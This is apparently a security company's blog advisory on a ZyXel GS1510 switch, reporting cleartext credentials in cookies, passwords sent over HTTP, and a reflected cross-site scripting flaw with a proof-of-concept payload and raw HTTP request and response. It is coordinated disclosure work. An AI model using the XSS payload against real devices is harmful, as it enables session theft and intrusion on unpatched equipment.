Multiple vulnerabilities in ZyXel GS1510
A few of weeks ago, one of the vulnerabilities that we identified was publicly released on Upsploit.com. These vulnerabilities were discovered in our testing environment while playing around with a ZyXel GS1510 ethernet switch.
This advisory was publicly released on the 2012-03-14 12:57:15 with an Upsploit reference of UPS-2011-0042.
The vulnerabilities that were discovered where the following:
1. The cookie for the admin user of the switch stored both the admin username password in clear text within the cookie.
2. The passwords of any users logging into the switch were being submitted in clear text over HTTP via the following form:
http://192.168.1.5/webctrl.cgi
HTTP Request
GET /login.htm HTTP/1.1
Host: 192.168.1.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cache-Control: max-age=0
SSSSSSS: UUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: admin=password123
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive
3. Cross Site Scripting
The payload fe07b</title><script>alert(xss)</ script>b7e71e54af6 was submitted in the name of an arbitrarily supplied request parameter.
This input was echoed unmodified in the application’s response, as can be seen below.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response.
Request
GET /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1 HTTP/1.1 Host: 192.168.1.5
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Cookie: admin=password123
Response
HTTP/1.1 200 OK
Server: thttpd/2.25b 29dec2003 Content-Type: text/html; charset=iso-8859-1 Date: Sun, 18 Sep 2011 16:30:14 GMT Last-Modified: Sat, 01 Jan 2000 00:00:03 GMT Accept-Ranges: bytes
Connection: close
<HTML>
<HEAD><TITLE>Index of /images/?fe07b</title><script>alert(1)</script>b7e71e54af6=1</TITLE></HEAD> <BODY BGCOLOR="#99cc99" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc">
<H2>Index of /images/?fe
…[SNIP]…
Congratulations go out to Neil Fryer for identifying and reporting this issue.
We would also like to extend out gratitude to the staff at ZyXel and also the guys at Upsploit.com for working with us to get these vulnerabilities patched in a timely manner.
This is just another reason why it’s always a good idea to have a penetration test or at the very least a vulnerability assessment conducted on all new devices that will be deployed within your organisations network.
If you would like any details on our device security testing or penetration testing services please feel free to contact us.